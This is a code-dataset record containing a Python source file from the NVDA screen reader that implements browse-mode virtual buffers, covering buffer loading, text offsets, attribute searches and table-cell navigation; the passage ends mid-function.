hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f718f6c4067656037123e38cebf5af9768e2732f | 28,363 | py | Python | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | 6 | 2021-03-08T07:28:08.000Z | 2022-02-23T02:48:23.000Z | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | null | null | null | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | 2 | 2021-07-16T00:25:27.000Z | 2022-03-24T08:36:36.000Z | # -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
# Search directions for VBuf_findNodeByAttributes; these values mirror the
# corresponding enum in the nvdaHelper C++ code and must stay in sync with it.
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
# A remote virtual buffer node handle is a 64 bit value (a pointer in the
# target process), so it must be marshalled as an unsigned long long.
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
	"""Marker string type: when a search value is an instance of this class,
	it is matched as a whole word within the attribute value rather than as
	an exact match of the entire value.
	"""
	pass
# Sentinel search value: the attribute must exist and have a non-empty value.
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
	# Symbols that are escaped in the attributes string.
	ord(u":"): r"\\:",
	ord(u";"): r"\\;",
	ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
	"""Build the arguments for a VBuf_findNodeByAttributes call.
	@param attribs: a mapping of attribute names to lists of acceptable values,
		or a sequence of such mappings (each mapping is one alternative "option").
	@return: a 2-tuple of (space separated requested attribute names,
		regular expression source matching any of the options).
	"""
	def _escape(value):
		# Coerce to text and escape characters that are special either in the
		# serialized attribute string or in a regular expression.
		return str(value).translate(FINDBYATTRIBS_ESCAPE_TABLE)
	if isinstance(attribs, dict):
		# A single option was supplied; normalise to a sequence of one.
		attribs = (attribs,)
	# Every option is matched against the union of all requested attribute
	# names, so gather the full name list first.
	requestedNames = []
	for option in attribs:
		requestedNames.extend(option)
	# Build one sub-pattern per option; any option may match.
	optionPatterns = []
	for option in attribs:
		parts = []
		for name in requestedNames:
			parts.append("%s:" % _escape(name))
			values = option.get(name)
			if not values:
				# The value isn't tested for this attribute, so match any (or no) value.
				parts.append(r"(?:\\;|[^;])*;")
			elif values[0] is VBufStorage_findMatch_notEmpty:
				# There must be a value for this attribute.
				parts.append(r"(?:\\;|[^;])+;")
			elif isinstance(values[0], VBufStorage_findMatch_word):
				# Assume all are word matches.
				parts.append(r"(?:\\;|[^;])*\b(?:")
				parts.append("|".join(_escape(val) for val in values))
				parts.append(r")\b(?:\\;|[^;])*;")
			else:
				# Assume all are exact matches or None (must not exist).
				parts.append("(?:")
				parts.append("|".join((_escape(val)+u';') if val is not None else u';' for val in values))
				parts.append(")")
		optionPatterns.append("".join(parts))
	return u" ".join(requestedNames), u"|".join(optionPatterns)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
	"""A quick navigation item (heading, link, etc.) backed by a node in a virtual buffer."""
	def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
		"""
		@param itemType: the quick nav item type (e.g. "heading", "link").
		@param document: the virtual buffer containing the node.
		@param vbufNode: the remote buffer node handle for this item.
		@param startOffset: start offset of the node within the buffer.
		@param endOffset: end offset of the node within the buffer.
		"""
		textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
		super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
		# Ask the in-process helper for the (docHandle, ID) pair identifying this node.
		docHandle=ctypes.c_int()
		ID=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
		self.vbufFieldIdentifier=(docHandle.value,ID.value)
		self.vbufNode=vbufNode
	@property
	def obj(self):
		# The NVDAObject corresponding to this buffer node.
		return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
	@property
	def label(self):
		attrs = {}
		def propertyGetter(prop):
			if not attrs:
				# Lazily fetch the attributes the first time they're needed.
				# We do this because we don't want to do this if they're not needed at all.
				attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
			return attrs.get(prop)
		return self._getLabelForProperties(propertyGetter)
	def isChild(self,parent):
		# Headings nest by level: a higher (numerically larger) level is a child
		# of a lower one.  Any missing/non-numeric level means "not a child".
		if self.itemType == "heading":
			try:
				if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
					> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
					return True
			except (KeyError, ValueError, TypeError):
				return False
		return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
	"""An offsets-based TextInfo over a remote virtual buffer.
	All primitive operations (text, offsets, selection, line boundaries) are
	delegated to the in-process nvdaHelper VBuf_* functions via ctypes,
	using the buffer handle stored on the owning L{VirtualBuffer} (self.obj).
	"""
	allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
	def _getControlFieldAttribs(self, docHandle, id):
		"""Return the attributes of the control field identified by (docHandle, id)
		that encloses this TextInfo's position.
		@raise LookupError: if no enclosing control field has that identifier.
		"""
		info = self.copy()
		info.expand(textInfos.UNIT_CHARACTER)
		# Walk the fields innermost-first looking for the requested identifier.
		for field in reversed(info.getTextWithFields()):
			if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
				# Not a control field.
				continue
			attrs = field.field
			if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
				return attrs
		raise LookupError
	def _getFieldIdentifierFromOffset(self, offset):
		"""Return the (docHandle, ID) of the control field node at a buffer offset.
		@raise LookupError: if no control field node exists at that offset.
		"""
		startOffset = ctypes.c_int()
		endOffset = ctypes.c_int()
		docHandle = ctypes.c_int()
		ID = ctypes.c_int()
		node=VBufRemote_nodeHandle_t()
		NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
		if not any((docHandle.value, ID.value)):
			raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
		return docHandle.value, ID.value
	def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
		"""Return the (start, end) buffer offsets of the control field node
		identified by (docHandle, ID).
		@raise LookupError: if the identifier maps to no node in the buffer.
		"""
		node=VBufRemote_nodeHandle_t()
		NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
		if not node:
			raise LookupError
		start = ctypes.c_int()
		end = ctypes.c_int()
		NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
		return start.value, end.value
	def _getBoundingRectFromOffset(self,offset):
		# Screen location of whatever object is rendered at this offset.
		o = self._getNVDAObjectFromOffset(offset)
		if not o:
			raise LookupError("no NVDAObject at offset %d" % offset)
		if o.hasIrrelevantLocation:
			raise LookupError("Object is off screen, invisible or has no location")
		return o.location
	def _getNVDAObjectFromOffset(self,offset):
		# Map a buffer offset back to an NVDAObject, or None if there is no
		# control field node at that offset.
		try:
			docHandle,ID=self._getFieldIdentifierFromOffset(offset)
		except LookupError:
			log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
			return None
		return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
	def _getOffsetsFromNVDAObjectInBuffer(self,obj):
		# Direct lookup: obj -> (docHandle, ID) -> buffer offsets.
		docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
		return self._getOffsetsFromFieldIdentifier(docHandle,ID)
	def _getOffsetsFromNVDAObject(self, obj):
		"""Like L{_getOffsetsFromNVDAObjectInBuffer}, but falls back to suitable
		ancestors when the object itself isn't rendered into the buffer.
		@raise LookupError: if neither the object nor a suitable container is in the buffer.
		"""
		while True:
			try:
				return self._getOffsetsFromNVDAObjectInBuffer(obj)
			except LookupError:
				pass
			# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
			# Use the container in this case.
			obj = obj.parent
			if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
				break
		raise LookupError
	def __init__(self,obj,position):
		# obj is the owning VirtualBuffer; its VBufHandle is used for all
		# remote buffer calls below.
		self.obj=obj
		super(VirtualBufferTextInfo,self).__init__(obj,position)
	def _getSelectionOffsets(self):
		start=ctypes.c_int()
		end=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
		return start.value,end.value
	def _setSelectionOffsets(self,start,end):
		NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
	def _getCaretOffset(self):
		# The caret is the collapsed start of the buffer selection.
		return self._getSelectionOffsets()[0]
	def _setCaretOffset(self,offset):
		return self._setSelectionOffsets(offset,offset)
	def _getStoryLength(self):
		return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
	def _getTextRange(self,start,end):
		if start==end:
			return u""
		return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
	def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
		"""Gets the placeholder attribute to be used.
		@return: The placeholder attribute when there is no content within the ControlField.
		None when the ControlField has content.
		@note: The content is considered empty if it holds a single space.
		"""
		placeholder = attrs.get(placeholderAttrsKey)
		# For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
		if not placeholder:
			return None
		# Get the start and end offsets for the field. This can be used to check if the field has any content.
		try:
			start, end = self._getOffsetsFromFieldIdentifier(
				int(attrs.get('controlIdentifier_docHandle')),
				int(attrs.get('controlIdentifier_ID')))
		except (LookupError, ValueError):
			log.debugWarning("unable to get offsets used to fetch content")
			return placeholder
		else:
			valueLen = end - start
			if not valueLen: # value is empty, use placeholder
				return placeholder
			# Because fetching the content of the field could result in a large amount of text
			# we only do it in order to check for space.
			# We first compare the length by comparing the offsets, if the length is less than 2 (ie
			# could hold space)
			if valueLen < 2:
				controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
				if not controlFieldText or controlFieldText == ' ':
					return placeholder
		return None
	def _getFieldsInRange(self,start,end):
		# Fetch the range as XML-marked-up text and parse it into a command
		# list, normalizing each control/format field on the way through.
		text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
		if not text:
			return ""
		commandList=XMLFormatting.XMLTextParser().parse(text)
		for index in range(len(commandList)):
			if isinstance(commandList[index],textInfos.FieldCommand):
				field=commandList[index].field
				if isinstance(field,textInfos.ControlField):
					commandList[index].field=self._normalizeControlField(field)
				elif isinstance(field,textInfos.FormatField):
					commandList[index].field=self._normalizeFormatField(field)
		return commandList
	def getTextWithFields(self,formatConfig=None):
		start=self._startOffset
		end=self._endOffset
		if start==end:
			return ""
		return self._getFieldsInRange(start,end)
	def _getWordOffsets(self,offset):
		#Use VBuf_getLineOffsets without screen layout to find out the range of the current field
		lineStart=ctypes.c_int()
		lineEnd=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
		# Clamp the superclass's word to the current field's boundaries.
		word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
		return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
	def _getLineOffsets(self,offset):
		# Lines honour the user's max line length and screen layout settings.
		lineStart=ctypes.c_int()
		lineEnd=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
		return lineStart.value,lineEnd.value
	def _getParagraphOffsets(self,offset):
		# A paragraph is an unwrapped (length 0) line with screen layout forced on.
		lineStart=ctypes.c_int()
		lineEnd=ctypes.c_int()
		NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
		return lineStart.value,lineEnd.value
	def _normalizeControlField(self,attrs):
		"""Convert raw string control field attributes to their typed Python
		equivalents and synthesize derived attributes (header text, uniqueID).
		"""
		tableLayout=attrs.get('table-layout')
		if tableLayout:
			attrs['table-layout']=tableLayout=="1"
		# convert some table attributes to ints
		for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
			attrVal=attrs.get(attr)
			if attrVal is not None:
				attrs[attr]=int(attrVal)
		isHidden=attrs.get('isHidden')
		if isHidden:
			attrs['isHidden']=isHidden=="1"
		# Handle table row and column headers.
		for axis in "row", "column":
			attr = attrs.pop("table-%sheadercells" % axis, None)
			if not attr:
				continue
			cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
			# Get the text for the header cells.
			textList = []
			for docHandle, ID in cellIdentifiers:
				try:
					start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
				except (LookupError, ValueError):
					continue
				textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
			attrs["table-%sheadertext" % axis] = "\n".join(textList)
		if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
			attrs['alwaysReportName'] = True
		# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
		docHandle=attrs.get('controlIdentifier_docHandle')
		ID=attrs.get('controlIdentifier_ID')
		if docHandle is not None and ID is not None:
			attrs['uniqueID']=(docHandle,ID)
		return attrs
	def _normalizeFormatField(self, attrs):
		# strippedCharsFromStart arrives as a decimal string; expose it as an int.
		strippedCharsFromStart = attrs.get("strippedCharsFromStart")
		if strippedCharsFromStart is not None:
			assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
			attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
		return attrs
	def _getLineNumFromOffset(self, offset):
		# Line numbers are not supported by virtual buffers.
		return None
	def _get_fieldIdentifierAtStart(self):
		return self._getFieldIdentifierFromOffset( self._startOffset)
	def _getUnitOffsets(self, unit, offset):
		# Control and format field units are resolved remotely; everything
		# else falls through to the offsets superclass.
		if unit == textInfos.UNIT_CONTROLFIELD:
			startOffset=ctypes.c_int()
			endOffset=ctypes.c_int()
			docHandle=ctypes.c_int()
			ID=ctypes.c_int()
			node=VBufRemote_nodeHandle_t()
			NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
			return startOffset.value,endOffset.value
		elif unit == textInfos.UNIT_FORMATFIELD:
			startOffset=ctypes.c_int()
			endOffset=ctypes.c_int()
			node=VBufRemote_nodeHandle_t()
			NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
			return startOffset.value,endOffset.value
		return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
	def _get_clipboardText(self):
		# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
		# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
		blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
		return "\r\n".join(blocks)
	def activate(self):
		# Activate (e.g. click) whatever is at this position.
		self.obj._activatePosition(info=self)
	def getMathMl(self, field):
		"""Return the MathML markup for a math control field.
		@param field: the control field attributes containing the node identifier.
		"""
		docHandle = int(field["controlIdentifier_docHandle"])
		nodeId = int(field["controlIdentifier_ID"])
		obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
		return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
	"""A browse mode tree interceptor backed by a remote virtual buffer.
	The buffer itself is rendered inside the target application's process by
	nvdaHelper; this class manages its life cycle (load/unload/refresh) and
	implements navigation, table movement and quick nav searches over it.
	"""
	TextInfo=VirtualBufferTextInfo
	#: Maps root identifiers (docHandle and ID) to buffers.
	rootIdentifiers = weakref.WeakValueDictionary()
	def __init__(self,rootNVDAObject,backendName=None):
		super(VirtualBuffer,self).__init__(rootNVDAObject)
		self.backendName=backendName
		self.VBufHandle=None
		self.isLoading=False
		self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
		self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
	def prepare(self):
		"""Load the buffer, provided the in-process helper has been injected."""
		if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
			# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
			# So at very least don't try to prepare a virtualBuffer as it will fail.
			# The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
			log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
			return
		self.shouldPrepare=False
		self.loadBuffer()
	def _get_shouldPrepare(self):
		return not self.isLoading and not self.VBufHandle
	def terminate(self):
		super(VirtualBuffer,self).terminate()
		if not self.VBufHandle:
			return
		self.unloadBuffer()
	def _get_isReady(self):
		return bool(self.VBufHandle and not self.isLoading)
	def loadBuffer(self):
		"""Start rendering the buffer on a background thread, announcing progress if it takes long."""
		self.isLoading = True
		self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
		threading.Thread(
			name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
			target=self._loadBuffer).start(
		)
	def _loadBuffer(self):
		# Runs on a background thread; completion is marshalled back to the
		# main thread via the event queue.
		try:
			if log.isEnabledFor(log.DEBUG):
				startTime = time.time()
			self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
				self.rootNVDAObject.appModule.helperLocalBindingHandle,
				self.rootDocHandle,self.rootID,
				self.backendName
			)
			if not self.VBufHandle:
				raise RuntimeError("Could not remotely create virtualBuffer")
		except Exception:
			# Narrowed from a bare except so SystemExit/KeyboardInterrupt aren't swallowed.
			log.error("", exc_info=True)
			queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
			return
		if log.isEnabledFor(log.DEBUG):
			log.debug("Buffer load took %.3f sec, %d chars" % (
				time.time() - startTime,
				NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
		queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
	def _loadBufferDone(self, success=True):
		self._loadProgressCallLater.Stop()
		del self._loadProgressCallLater
		self.isLoading = False
		if not success:
			self.passThrough=True
			return
		if self._hadFirstGainFocus:
			# If this buffer has already had focus once while loaded, this is a refresh.
			# Translators: Reported when a page reloads (example: after refreshing a webpage).
			ui.message(_("Refreshed"))
		if api.getFocusObject().treeInterceptor == self:
			self.event_treeInterceptor_gainFocus()
	def _loadProgress(self):
		# Translators: Reported while loading a document.
		ui.message(_("Loading document..."))
	def unloadBuffer(self):
		"""Destroy the remote buffer, guarding against a hung helper via watchdog."""
		if self.VBufHandle is not None:
			try:
				watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
			except WindowsError:
				pass
			self.VBufHandle=None
	def isNVDAObjectPartOfLayoutTable(self,obj):
		"""Return whether obj lives in a layout (non-data) table.
		Checks the object's own table-layout attribute first; otherwise walks
		up to the containing table field and reports its table-layout value.
		"""
		docHandle,ID=self.getIdentifierFromNVDAObject(obj)
		ID=str(ID)
		info=self.makeTextInfo(obj)
		info.collapse()
		info.expand(textInfos.UNIT_CHARACTER)
		fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
		tableLayout=None
		tableID=None
		# First find the field for the object itself: it may carry table-layout
		# directly, or name the table it belongs to.
		for fieldCommand in fieldCommands:
			fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
			if fieldID==ID:
				tableLayout=fieldCommand.field.get('table-layout')
				if tableLayout is not None:
					return tableLayout
				tableID=fieldCommand.field.get('table-id')
				break
		if tableID is None:
			return False
		# Otherwise look up the table's own field for its layout flag.
		for fieldCommand in fieldCommands:
			fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
			if fieldID==tableID:
				tableLayout=fieldCommand.field.get('table-layout',False)
				break
		return tableLayout
	@abstractmethod
	def getNVDAObjectFromIdentifier(self, docHandle, ID):
		"""Retrieve an NVDAObject for a given node identifier.
		Subclasses must override this method.
		@param docHandle: The document handle.
		@type docHandle: int
		@param ID: The ID of the node.
		@type ID: int
		@return: The NVDAObject.
		@rtype: L{NVDAObjects.NVDAObject}
		"""
		raise NotImplementedError
	@abstractmethod
	def getIdentifierFromNVDAObject(self,obj):
		"""Retrieves the virtualBuffer field identifier from an NVDAObject.
		@param obj: the NVDAObject to retrieve the field identifier from.
		@type obj: L{NVDAObject}
		@returns: the field identifier as a doc handle and ID pair.
		@rtype: 2-tuple.
		"""
		raise NotImplementedError
	def script_refreshBuffer(self,gesture):
		if scriptHandler.isScriptWaiting():
			# This script may cause subsequently queued scripts to fail, so don't execute.
			return
		self.unloadBuffer()
		self.loadBuffer()
	# Translators: the description for the refreshBuffer script on virtualBuffers.
	script_refreshBuffer.__doc__ = _("Refreshes the document content")
	def script_toggleScreenLayout(self,gesture):
		config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
		if config.conf["virtualBuffers"]["useScreenLayout"]:
			# Translators: Presented when use screen layout option is toggled.
			ui.message(_("Use screen layout on"))
		else:
			# Translators: Presented when use screen layout option is toggled.
			ui.message(_("Use screen layout off"))
	# Translators: the description for the toggleScreenLayout script on virtualBuffers.
	script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
	def _searchableAttribsForNodeType(self,nodeType):
		"""Return the attribute sets to search for nodes of the given type.
		Base implementation knows no node types; subclasses override.
		Returning a false value makes L{_iterNodesByType} raise NotImplementedError.
		"""
		# Fix: _iterNodesByType calls _searchableAttribsForNodeType, but this
		# stub was previously misnamed _searchableAttributesForNodeType, so
		# subclasses lacking an override got AttributeError instead of the
		# intended NotImplementedError.
		pass
	#: Backward-compatible alias for the previously misspelled stub name.
	_searchableAttributesForNodeType = _searchableAttribsForNodeType
	def _iterNodesByType(self,nodeType,direction="next",pos=None):
		attribs=self._searchableAttribsForNodeType(nodeType)
		if not attribs:
			raise NotImplementedError
		return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
	def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
		"""Yield L{VirtualBufferQuickNavItem}s for buffer nodes matching attribs,
		walking from pos in the given direction ("next", "previous" or "up").
		"""
		offset=pos._startOffset if pos else -1
		reqAttrs, regexp = _prepareForFindByAttributes(attribs)
		startOffset=ctypes.c_int()
		endOffset=ctypes.c_int()
		if direction=="next":
			direction=VBufStorage_findDirection_forward
		elif direction=="previous":
			direction=VBufStorage_findDirection_back
		elif direction=="up":
			direction=VBufStorage_findDirection_up
		else:
			raise ValueError("unknown direction: %s"%direction)
		while True:
			try:
				node=VBufRemote_nodeHandle_t()
				NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
			except Exception:
				# Narrowed from a bare except; a failed remote call ends the iteration.
				return
			if not node:
				return
			yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
			# Continue searching from the start of the match just found.
			offset=startOffset.value
	def _getTableCellAt(self,tableID,startPos,row,column):
		"""Return the TextInfo for the cell at exactly (row, column) in the table.
		@raise LookupError: if there is no such cell.
		"""
		try:
			return next(self._iterTableCells(tableID,row=row,column=column))
		except StopIteration:
			raise LookupError
	def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
		"""Yield TextInfos for cells of the given table, optionally filtered
		by row and/or column number.
		"""
		attrs = {"table-id": [str(tableID)]}
		# row could be 0.
		if row is not None:
			attrs["table-rownumber"] = [str(row)]
		if column is not None:
			attrs["table-columnnumber"] = [str(column)]
		results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
		if not startPos and not row and not column and direction == "next":
			# The first match will be the table itself, so skip it.
			next(results)
		for item in results:
			yield item.textInfo
	def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
		"""Find the cell adjacent to (origRow, origCol) along the given axis,
		accounting for cells that span multiple rows/columns.
		@raise LookupError: if there is no suitable adjacent cell.
		"""
		# Determine destination row and column.
		destRow = origRow
		destCol = origCol
		if axis == "row":
			destRow += origRowSpan if movement == "next" else -1
		elif axis == "column":
			destCol += origColSpan if movement == "next" else -1
		if destCol < 1:
			# Optimisation: We're definitely at the edge of the column.
			raise LookupError
		# Optimisation: Try searching for exact destination coordinates.
		# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
		try:
			return self._getTableCellAt(tableID,startPos,destRow,destCol)
		except LookupError:
			pass
		# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
		for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
			_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
			if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
				return info
			elif row > destRow and movement == "next":
				# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
				# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
				break
		if axis == "row" or (axis == "column" and movement == "previous"):
			# In most cases, there's nothing more to try.
			raise LookupError
		else:
			# We're moving forward by column.
			# In this case, there might be a cell on an earlier row which spans multiple rows.
			# Therefore, try searching backwards.
			for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
				_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
				if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
					return info
			else:
				raise LookupError
	def _isSuitableNotLinkBlock(self, textRange):
		# A "not link block" must be at least NOT_LINK_BLOCK_MIN_LEN characters long.
		return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
	def getEnclosingContainerRange(self, textRange):
		"""Return a TextInfo covering the innermost container (list, table,
		blockquote, frame or landmark) enclosing textRange, or None.
		"""
		formatConfig=config.conf['documentFormatting'].copy()
		formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
		controlFields=[]
		for cmd in textRange.getTextWithFields():
			if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
				break
			controlFields.append(cmd.field)
		containerField=None
		# Walk outward from the innermost field looking for a container.
		while controlFields:
			field=controlFields.pop()
